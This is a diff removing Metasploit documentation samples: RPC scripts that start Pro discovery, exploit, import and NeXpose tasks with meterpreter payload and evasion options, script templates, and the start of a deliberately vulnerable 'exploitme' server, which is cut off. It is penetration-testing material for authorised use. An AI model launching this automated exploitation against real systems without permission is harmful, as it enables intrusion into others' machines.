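-        'DS_PORTSCAN_TIMEOUT' 	=> portscan_timeout,
-        'DS_PORTSCAN_SOURCE_PORT' => source_port,
-        'DS_CustomNmap'		=> custom_nmap_options,
-        'DS_UDP_PROBES'		=> disable_udp_probes,
-        'DS_FINGER_USERS'	=> disable_finger_users,
-        'DS_SNMP_SCAN'		=> disable_snmp_scan,
-        'DS_IDENTIFY_SERVICES'	=> disable_service_identification,
-        'DS_SMBUser'		=> smb_user,
-        'DS_SMBPass'		=> smb_pass,
-        'DS_SMBDomain'		=> smb_domain,
-        'DS_SINGLE_SCAN'	=> single_scan, 
-        'DS_FAST_DETECT'	=> fast_detect
-})
-
-puts "DEBUG: Running task with #{task.inspect}"
-
-if not task['task_id']
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
-  exit(0)
-end
-
-puts "[*] Creating Task ID #{task['task_id']}..."
-while true
-  select(nil, nil, nil, 0.50)
-
-  stat = @rpc.call("pro.task_status", task['task_id'])
-
-  if stat['status'] == 'invalid'
-    $stderr.puts "[-] Error checking task status"
-    exit(0)
-  end
-
-  info = stat[ task['task_id'] ]
-
-  if not info
-    $stderr.puts "[-] Error finding the task"
-    exit(0)
-  end
-
-  if info['status'] == "error"
-    $stderr.puts "[-] Error generating report: #{info['error']}"
-    exit(0)
-  end
-
-  break if info['progress'] == 100
-end
-
-$stdout.puts "[+] Task Complete!"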

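--- a/documentation/samples/pro/msfrpc_pro_exploit.rb
+++ b/documentation/samples/pro/msfrpc_pro_exploit.rb
@@ -1,225 +0,0 @@
-#!/usr/bin/env ruby
-require 'rubygems'
-require 'optparse'
-require 'msfrpc-client'
-require 'rex/ui'
-
-def usage(ropts)
-  $stderr.puts ropts
-
-  if @rpc and @rpc.token
-    wspaces = @rpc.call("pro.workspaces") rescue {}
-    if wspaces.keys.length > 0
-      $stderr.puts "Active Projects:"
-      wspaces.each_pair do |k,v|
-        $stderr.puts "\t#{k}"
-      end
-    end
-  end
-  $stderr.puts ""
-  exit(1)
-end
-
-opts = {}
-opts[:blacklist]      = ''
-opts[:whitelist_ports] = ''
-opts[:blacklist_ports] = ''
-opts[:exploit_timeout] = 5
-opts[:limit_sessions] = true
-opts[:ignore_fragile_devices] = true
-opts[:filter_by_os]   = true
-opts[:only_match]     = false
-opts[:match_vulns]    = true
-opts[:match_ports]    = true
-opts[:payload_method] = "auto"
-opts[:payload_type]   = "meterpreter"
-opts[:payload_ports]  = "4000-5000"
-opts[:evasion_level_tcp] = 0
-opts[:evasion_level_app] = 0
-opts[:module_filter] = ''
-
-# Parse script-specific options
-parser = Msf::RPC::Client.option_parser(opts)
-parser.separator('Exploit Specific Options:')
-
-parser.on("--project PROJECT") do |x|
-  opts[:project] = x
-end
-
-parser.on("--targets TARGETS") do |x|
-  opts[:targets] = x
-end
-
-parser.on("--speed SPEED") do |x|
-  opts[:speed] = x
-end
-
-parser.on("--minimum-rank RANK") do |x|
-  opts[:rank] = x
-end
-
-parser.on("--blacklist BLACKLIST (optional)") do |x|
-  opts[:blacklist] = x
-end
-
-parser.on("--whitelist-ports PORTS (optional)") do |x|
-  opts[:whitelist_ports] = x
-end
-
-parser.on("--blacklist-ports PORTS (optional)") do |x|
-  opts[:blacklist_ports] = x
-end
-
-parser.on("--exploit-timeout TIMEOUT (optional)") do |x|
-  opts[:exploit_timeout] = x
-end
-
-parser.on("--limit-sessions (optional)") do |x|
-  opts[:limit_sessions] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--ignore-fragile-devices (optional)") do |x|
-  opts[:ignore_fragile_devices] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--filter-by-os (optional)") do |x|
-  opts[:filter_by_os] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--dry-run (optional)") do |x|
-  opts[:only_match] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--match-vulns (optional)") do |x|
-  opts[:match_vulns] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--match-ports (optional)") do |x|
-  opts[:match_ports] = (x =~ /^(y|t|1)/i ? true : false )
-end
-
-parser.on("--payload-method AUTO|REVERSE|BIND (optional)") do |x|
-  opts[:payload_method] = x
-end
-
-parser.on("--payload-type METERPRETER|SHELL (optional)") do |x|
-  opts[:payload_type] = x
-end
-
-parser.on("--payload-ports PORTS (optional)") do |x|
-  opts[:payload_ports] = x
-end
-
-parser.on("--evasion-level-tcp LEVEL (optional)") do |x|
-  opts[:evasion_level_tcp] = x
-end
-
-parser.on("--evasion-level-app LEVEL (optional)") do |x|
-  opts[:evasion_level_app] = x
-end
-
-parser.on("--module-filter FILTER (optional)") do |x|
-  opts[:module_filter] = x
-end
-
-parser.on("--help") do
-  $stderr.puts parser
-  exit(1)
-end
-
-parser.separator('')
-parser.parse!(ARGV)
-
-@rpc  = Msf::RPC::Client.new(opts)
-
-if not @rpc.token
-  $stderr.puts "Error: Invalid RPC server options specified"
-  $stderr.puts parser
-  exit(1)
-end
-
-# Store the user's settings
-project 			= opts[:project]	|| usage(parser)
-targets 			= opts[:targets]	|| usage(parser)
-rank				= opts[:rank]		|| usage(parser)
-speed				= opts[:speed]		|| usage(parser)
-blacklist			= opts[:blacklist]
-whitelist_ports			= opts[:whitelist_ports]
-blacklist_ports			= opts[:blacklist_ports]
-exploit_timeout			= opts[:exploit_timeout] 
-limit_sessions			= opts[:limit_sessions]
-ignore_fragile_devices		= opts[:ignore_fragile_devices] 
-filter_by_os			= opts[:filter_by_os]
-only_match			= opts[:only_match]
-match_vulns			= opts[:match_vulns]
-match_ports			= opts[:match_ports]
-payload_method			= opts[:payload_method]
-payload_type			= opts[:payload_type]
-payload_ports			= opts[:payload_ports]
-evasion_level_tcp		= opts[:evasion_level_tcp]
-evasion_level_app		= opts[:evasion_level_app]
-module_filter			= opts[:module_filter]
-#===
-
-# Get the default user
-user   		= @rpc.call("pro.default_admin_user")['username']
-
-# Create the task object with all options
-task 		= @rpc.call("pro.start_exploit", {
-        'workspace'			=> project,
-        'username' 			=> user,
-        'DS_WHITELIST_HOSTS'		=> targets,
-        'DS_BLACKLIST_HOSTS'		=> blacklist,
-        'DS_WHITELIST_PORTS'    	=> whitelist_ports,
-        'DS_BLACKLIST_PORTS'		=> blacklist_ports, 
-        'DS_MinimumRank' 		=> rank, 
-        'DS_EXPLOIT_SPEED'		=> speed, 
-        'DS_EXPLOIT_TIMEOUT'		=> exploit_timeout,
-        'DS_LimitSessions'		=> limit_sessions,
-        'DS_IgnoreFragileDevices' 	=> ignore_fragile_devices, 
-        'DS_FilterByOS'			=> filter_by_os, 
-        'DS_OnlyMatch'			=> only_match,
-        'DS_MATCH_VULNS'		=> match_vulns,
-        'DS_MATCH_PORTS'		=> match_ports, 
-        'DS_PAYLOAD_METHOD'		=> payload_method, 
-        'DS_PAYLOAD_TYPE'		=> payload_type, 
-        'DS_PAYLOAD_PORTS'		=> payload_ports, 
-        'DS_EVASION_LEVEL_TCP'		=> evasion_level_tcp, 
-        'DS_EVASION_LEVEL_APP'		=> evasion_level_app,
-        'DS_ModuleFilter'		=> module_filter
-})
-
-puts "DEBUG: Running task with #{task.inspect}"
-
-if not task['task_id']
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
-  exit(0)
-end
-
-puts "[*] Creating Task ID #{task['task_id']}..."
-while true
-  select(nil, nil, nil, 0.50)
-
-  stat = @rpc.call("pro.task_status", task['task_id'])
-
-  if stat['status'] == 'invalid'
-    $stderr.puts "[-] Error checking task status"
-    exit(0)
-  end
-
-  info = stat[ task['task_id'] ]
-
-  if not info
-    $stderr.puts "[-] Error finding the task"
-    exit(0)
-  end
-
-  if info['status'] == "error"
-    $stderr.puts "[-] Error generating report: #{info['error']}"
-    exit(0)
-  end
-
-  break if info['progress'] == 100
-end
-
-$stdout.puts "[+] Task Complete!"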

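--- a/documentation/samples/pro/msfrpc_pro_import.rb
+++ b/documentation/samples/pro/msfrpc_pro_import.rb
@@ -1,91 +0,0 @@
-#!/usr/bin/env ruby
-require 'rubygems'
-require 'optparse'
-require 'msfrpc-client'
-require 'rex/ui'
-
-def usage(ropts)
-  $stderr.puts ropts
-
-  if @rpc and @rpc.token
-    wspaces = @rpc.call("pro.workspaces") rescue {}
-    if wspaces.keys.length > 0
-      $stderr.puts "Active Projects:"
-      wspaces.each_pair do |k,v|
-        $stderr.puts "\t#{k}"
-      end
-    end
-  end
-  exit(1)
-end
-
-opts = {}
-
-# Parse script-specific options
-parser = Msf::RPC::Client.option_parser(opts)
-parser.separator('Task Options:')
-
-parser.on("--path PATH") do |path|
-  opts[:path] = path
-end
-
-parser.on("--project PROJECT") do |project|
-  opts[:project] = project
-end
-
-parser.on("--help") do
-  $stderr.puts parser
-  exit(1)
-end
-parser.separator('')
-
-parser.parse!(ARGV)
-@rpc  = Msf::RPC::Client.new(opts)
-
-if not @rpc.token
-  $stderr.puts "Error: Invalid RPC server options specified"
-  $stderr.puts parser
-  exit(1)
-end
-
-project 	= opts[:project] 	|| usage(parser)
-path 		= opts[:path]		|| usage(parser)
-user  		= @rpc.call("pro.default_admin_user")['username']
-task 		= @rpc.call("pro.start_import", {
-      'workspace'		=> project,
-      'username' 		=> user,
-      'DS_PATH'		=> path
-})
-
-if not task['task_id']
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
-  exit(0)
-end
-
-puts "[*] Creating Task ID #{task['task_id']}..."
-while true
-  select(nil, nil, nil, 0.50)
-
-  stat = @rpc.call("pro.task_status", task['task_id'])
-
-  if stat['status'] == 'invalid'
-    $stderr.puts "[-] Error checking task status"
-    exit(0)
-  end
-
-  info = stat[ task['task_id'] ]
-
-  if not info
-    $stderr.puts "[-] Error finding the task"
-    exit(0)
-  end
-
-  if info['status'] == "error"
-    $stderr.puts "[-] Error generating report: #{info['error']}"
-    exit(0)
-  end
-
-  break if info['progress'] == 100
-end
-
-$stdout.puts "[+] Task Complete!"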

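--- a/documentation/samples/pro/msfrpc_pro_nexpose.rb
+++ b/documentation/samples/pro/msfrpc_pro_nexpose.rb
@@ -1,148 +0,0 @@
-#!/usr/bin/env ruby
-require 'rubygems'
-require 'optparse'
-require 'msfrpc-client'
-require 'rex/ui'
-
-def usage(ropts)
-  $stderr.puts ropts
-
-  if @rpc and @rpc.token
-    wspaces = @rpc.call("pro.workspaces") rescue {}
-    if wspaces.keys.length > 0
-      $stderr.puts "Active Projects:"
-      wspaces.each_pair do |k,v|
-        $stderr.puts "\t#{k}"
-      end
-    end
-  end
-  $stderr.puts ""
-  exit(1)
-end
-
-opts = {}
-
-# Parse script-specific options
-parser = Msf::RPC::Client.option_parser(opts)
-parser.separator('NeXpose Specific Options:')
-
-parser.on("--project PROJECT") do |x|
-  opts[:project] = x
-end
-
-parser.on("--targets TARGETS") do |x|
-  opts[:targets] = [x]
-end
-
-parser.on("--nexpose-host HOST") do |x|
-  opts[:nexpose_host] = x
-end
-
-parser.on("--nexpose-user USER") do |x|
-  opts[:nexpose_user] = x
-end
-
-parser.on("--nexpose-pass PASSWORD") do |x|
-  opts[:nexpose_pass] = x
-end
-
-parser.on("--nexpose-pass-file PATH") do |x|
-  opts[:nexpose_pass_file] = x
-end
-
-parser.on("--scan-template TEMPLATE (optional)") do |x|
-  opts[:scan_template] = x
-end
-
-parser.on("--nexpose-port PORT (optional)") do |x|
-  opts[:nexpose_port] = x
-end
-
-parser.on("--blacklist BLACKLIST (optional)") do |x|
-  opts[:blacklist] = x
-end
-
-parser.on("--help") do
-  $stderr.puts parser
-  exit(1)
-end
-
-parser.separator('')
-parser.parse!(ARGV)
-
-@rpc  = Msf::RPC::Client.new(opts)
-
-if not @rpc.token
-  $stderr.puts "Error: Invalid RPC server options specified"
-  $stderr.puts parser
-  exit(1)
-end
-
-# Get the password from the file
-if opts[:nexpose_pass_file]
-  nexpose_pass = File.open(opts[:nexpose_pass_file],"r").read.chomp!
-else
-  nexpose_pass = opts[:nexpose_pass] || usage(parser)
-end
-
-# Store the user's settings
-project 			= opts[:project]		|| usage(parser),
-targets 			= opts[:targets]		|| usage(parser),
-blacklist			= opts[:blacklist],
-nexpose_host			= opts[:nexpose_host] 		|| usage(parser),
-nexpose_port			= opts[:nexpose_port]		|| "3780",
-nexpose_user			= opts[:nexpose_user]		|| "nxadmin"
-scan_template			= opts[:scan_template]		|| "pentest-audit"
-
-# Get the default user
-user   		= @rpc.call("pro.default_admin_user")['username']
-
-options = {
-        'workspace'			=> project,
-        'username' 			=> user,
-        'DS_WHITELIST_HOSTS'		=> targets,
-        'DS_NEXPOSE_HOST'		=> nexpose_host,
-        'DS_NEXPOSE_PORT'		=> nexpose_port,
-        'DS_NEXPOSE_USER'		=> nexpose_user,
-        'nexpose_pass'			=> nexpose_pass,
-        'DS_SCAN_TEMPLATE'		=> scan_template
-}
-
-puts "DEBUG: Running task with #{options}"
-
-# Create the task object with all options
-task 		= @rpc.call("pro.start_exploit", options)
-
-
-if not task['task_id']
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
-  exit(0)
-end
-
-puts "[*] Creating Task ID #{task['task_id']}..."
-while true
-  select(nil, nil, nil, 0.50)
-
-  stat = @rpc.call("pro.task_status", task['task_id'])
-
-  if stat['status'] == 'invalid'
-    $stderr.puts "[-] Error checking task status"
-    exit(0)
-  end
-
-  info = stat[ task['task_id'] ]
-
-  if not info
-    $stderr.puts "[-] Error finding the task"
-    exit(0)
-  end
-
-  if info['status'] == "error"
-    $stderr.puts "[-] Error generating report: #{info['error']}"
-    exit(0)
-  end
-
-  break if info['progress'] == 100
-end
-
-$stdout.puts "[+] Task Complete!"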

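--- a/documentation/samples/scripts/meterpreter_script_template.rb
+++ b/documentation/samples/scripts/meterpreter_script_template.rb
@@ -1,43 +0,0 @@
-# $Id$
-# $Revision$
-# Author: 
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-
-@client = client
-sample_option_var = nil
-@exec_opts = Rex::Parser::Arguments.new(
-  "-h" => [ false, "Help menu." ],
-  "-o" => [ true , "Option that requieres a value"]
-  )
-meter_type = client.platform
-
-################## Function Declarations ##################
-
-# Usage Message Function
-#-------------------------------------------------------------------------------
-def usage
-  print_line "Meterpreter Script for INSERT PURPOSE."
-  print_line(@exec_opts.usage)
-  raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end
-
-################## Main ##################
-@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    usage
-  when "-o"
-    sample_option_var = val
-  end
-}
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64|java|php|linux/i # Remove none supported versions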

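--- a/documentation/samples/scripts/resource_script.rb
+++ b/documentation/samples/scripts/resource_script.rb
@@ -1,132 +0,0 @@
-<ruby>
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-#
-# Put your 'require' here
-#
-
-#
-# RC files currently have no 'modinfo' like a real Metasploit module, so this help message
-# will have to do the trick for now.
-#
-def help
-  msg = %Q|
-  Description:
-    Let's describe what this RC script is all about, plus anything the user should know before
-    actually using it.
-
-  Usage:
-    msfconsole -r <rc file> <db_user> <db_pass> <db_workspace> <arg1>
-
-  Options:
-    <rc file>      - I'm sure you already know
-    <db_user>      - Username for the database  (datastore: 'DB_USER')
-    <db_pass>      - Password for the database  (datastore: 'DB_PASS')
-    <db_workspace> - Workspace for the database (datastore: 'DB_WORKSPACE')
-    <arg1>         - Argument 1                 (datastore: 'ARG1')
-
-  Authors:
-    sinn3r <sinn3r[at]metasploit.com>
-  |
-
-  msg = msg.gsub(/^\t/, '')
-  print_line(msg)
-end
-
-
-#
-# See if we're already connected
-#
-def is_db_active?
-  begin
-    framework.db.hosts
-    return true
-  rescue ::ActiveRecord::ConnectionNotEstablished
-    return false
-  end
-end
-
-
-#
-# Initialize the database.
-# Default to localhost:5432, as this is the default configuration suggested by the manual.
-#
-def init_db(username, password, workspace)
-  db = "localhost:5432"
-  print_status("Opening #{workspace} at #{db}")
-  run_single("db_connect #{username}:#{password}@#{db}/#{workspace}")
-end
-
-
-#
-# Initialize the argumets here
-#
-def init_args
-  args = {}
-
-  joint = ARGV.join('')
-  if joint =~ /^help$/i
-    args[:help] = true
-    return args
-  end
-
-  # Add more arguments according to your help() function
-  datastore = framework.datastore
-  args[:db_user]      = ARGV.shift || datastore['DB_USER'] || ''
-  args[:db_pass]      = ARGV.shift || datastore['DB_PASS'] || ''
-  args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
-  args[:arg1]         = ARGV.shift || datastore['ARG1'] || ''
-
-  if not is_db_active?
-    if args[:db_user].empty? or args[:db_pass].empty? or args[:db_workspace].empty?
-      raise ArgumentError, "Need DB_USER, DB_PASS, and DB_WORKSPACE"
-    end
-  end
-
-  raise ArgumentError, "Need ARG1" if args[:arg1].empty?
-
-  return args
-end
-
-
-#
-# This is your main function
-#
-def main(args)
-  print_status("Initialzation is done, and here's your input: #{args[:arg1]}")
-end
-
-
-#
-# Below initializes the arguments and database
-#
-begin
-  args = init_args
-  if args[:help]
-    help
-    return
-  end
-
-  init_db(args[:db_user], args[:db_pass], args[:db_workspace]) if not is_db_active?
-  main(args)
-
-rescue ArgumentError => e
-  print_error("Bad argument(s): #{e.message}")
-  return
-
-rescue RuntimeError => e
-  # Any runtime error should be raised as "RuntimeError"
-  print_error(e.message)
-  return
-
-rescue ::Exception => e
-  # Whatever unknown exception occurs, we raise it
-  raise e
-end
-
-</ruby>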

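--- a/documentation/samples/vulnapps/exploitme-posix/Makefile
+++ b/documentation/samples/vulnapps/exploitme-posix/Makefile
@@ -1,5 +0,0 @@
-all:	exploitmel
-exploitmel:	exploitme-posix.c
-	gcc -W -Wall $< -o $@
-clean:
-	rm exploitmel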

+ 0
- 105
documentation/samples/vulnapps/exploitme-posix/exploitme-posix.c View File

@@ -1,105 +0,0 @@
1
-/* exploitme coded in a hurry by Yoann Guillot and Julien Tinnes, used 'man select_tut' as skeleton */
2
-#include <stdlib.h>
3
-#include <stdio.h>
4
-#include <unistd.h>
5
-#include <sys/time.h>
6
-#include <sys/types.h>
7
-#include <string.h>
8
-#include <signal.h>
9
-#include <sys/socket.h>
10
-#include <netinet/in.h>
11
-#include <arpa/inet.h>
12
-#include <errno.h>
13
-#include <sys/mman.h>
14
-#include <malloc.h>
15
-
16
-#define LISTEN_PORT 4545
17
-
18
-int	vuln(void) {
19
-	struct sockaddr_in a;
20
-	int s, mysock;
21
-	int yes, ret, pagesize;
22
-	void *buf;
23
-
24
-	pagesize = sysconf(_SC_PAGE_SIZE);
25
-	if (pagesize == -1) {
26
-		perror("pagesize");
27
-		return -1;
28
-	}
29
-
30
-	if (pagesize < 4096)
31
-		pagesize=(4096/pagesize+1)*pagesize;
32
-	printf("Detected pagesize: %d\n", pagesize);
33
-	buf=memalign(pagesize, pagesize);
34
-	if (buf == NULL) {
35
-		perror("memalign");
36
-		return -1;
37
-	}
38
-	if ((s = socket (AF_INET, SOCK_STREAM, 0)) < 0) {
39
-		perror ("socket");
40
-		return -1;
41
-	}
42
-	yes = 1;
43
-	if (setsockopt
44
-			(s, SOL_SOCKET, SO_REUSEADDR,
45
-			 (char *) &yes, sizeof (yes)) < 0) {
46
-		perror ("setsockopt");
47
-		close (s);
48